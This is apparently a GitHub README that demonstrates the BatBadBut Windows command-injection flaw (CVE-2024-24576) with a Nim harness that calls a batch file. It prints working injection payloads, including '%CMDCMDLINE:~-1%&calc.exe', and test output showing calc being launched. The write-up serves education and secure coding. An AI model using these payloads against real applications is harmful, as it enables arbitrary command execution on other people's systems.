README.md | Loading last commit info... | |
main.nim | ||
test.bat |
Exploring Command Injection Vulnerabilities in Windows with Nim
In light of the recent discovery outlined in Flatt Security Research's article, the BatBadBut
vulnerability (CVE-2024-24576) presents a critical concern for Windows' command execution security. A practical investigation using Nim programming language offers insight into how attackers might exploit this vulnerability.
Nim, known for its efficiency and expressiveness, isn't immune to the subtle intricacies of command execution on Windows. By experimenting with a simple Nim script designed to execute a test.bat
file with varying inputs, we uncover the nuances of command injection vulnerability.
The Experiment
The Nim script executes the batch file in three distinct manners:
- Without quoting the shell input.
- With quoting, using
quoteShell
. - Direct shell command execution.
import osproc, os
block execProcess_NoQuoteShell:
echo "[*] execProcess NoQuoteShell"
echo "enter payload here"
let input = readLine(stdin)
let output =
execProcess("test.bat", args = @[input], options = {poUsePath,
poStdErrToStdOut})
echo "Output:\n", output
block execProcess_QuoteShell:
echo "[*] execProcess QuoteShell"
echo "enter payload here"
let input = readLine(stdin).quoteShell()
let output =
execProcess("test.bat", args = @[input], options = {poUsePath,
poStdErrToStdOut})
echo "Output:\n", output
block execShellCmd:
echo "[*] execShellCmd"
echo "enter payload here"
let input = readLine(stdin)
echo "Output:"
discard execShellCmd("test.bat " & input)
Test 1: Simple Payload
A benign command, nim &calc
, reveals differing behaviors:
- The unquoted execution passes the payload intact, echoing back without unintended consequences.
- Quoting via
quoteShell
results in misinterpretation, breaking the command. - Direct execution surprisingly splits the input, inadvertently running
calc
.
[*] execProcess NoQuoteShell
enter payload here
nim &calc
Output:
Argument received: "nim &calc" # Excpaed correctly
[*] execProcess QuoteShell
enter payload here
nim &calc
Output:
Argument received: "\"nim
'calc\""' is not recognized as an internal or external command,
operable program or batch file.
[*] execShellCmd
enter payload here
nim &calc
Output:
Argument received: nim # it run calc
Test 2: Sophisticated Payload
Using a more complex payload, nim" &calc
, illustrate further discrepancies:
- Unquoted execution interprets the command in a risky manner, running
calc
. - Quoted execution, this time, correctly escapes, showcasing the intended safety mechanism.
- Direct execution correctly handles the input but underscores potential risk areas.
[*] execProcess NoQuoteShell
enter payload here
nim" &calc
Output:
Argument received: "nim\" #it run calc
[*] execProcess QuoteShell
enter payload here
nim" &calc
Output:
Argument received: "\"nim\\\" &calc\"" #ecaped correctly
[*] execShellCmd
enter payload here
nim" &calc
Output:
Argument received: nim" &calc # escaped correctly
Test 3: Exploitative Payload
An exploitative payload %CMDCMDLINE:~-1%&calc.exe
, designed to directly invoke calc.exe
, unearths a consistent threat across all execution methods, demonstrating the ease of initiating unintended commands.
[*] execProcess NoQuoteShell
enter payload here
%CMDCMDLINE:~-1%&calc.exe
Output:
Argument received: e
[*] execProcess QuoteShell
enter payload here
%CMDCMDLINE:~-1%&calc.exe
Output:
Argument received: e
[*] execShellCmd
enter payload here
%CMDCMDLINE:~-1%&calc.exe
Output:
Argument received: e
Conclusion
This exploration underscores the critical need for vigilance and proper input handling in programming languages running on Windows. While Nim provides mechanisms to mitigate injection attacks, the effectiveness heavily relies on the developer's awareness and application of security best practices. The BatBadBut
vulnerability serves as a stark reminder of the ever-present risks in software development and the importance of continuous learning and adaptation.
For developers, this experiment highlights the importance of sanitizing input and carefully considering the execution context of external commands. The detailed research and PoC can further guide and inform secure coding practices, available at the following links:
- CVE-2024-24576 PoC on GitHub: https://github.com/frostb1ten/CVE-2024-24576-PoC
- Flatt Security Research article: https://flatt.tech/research/posts/batbadbut-you-cant-securely-execute-commands-on-windows/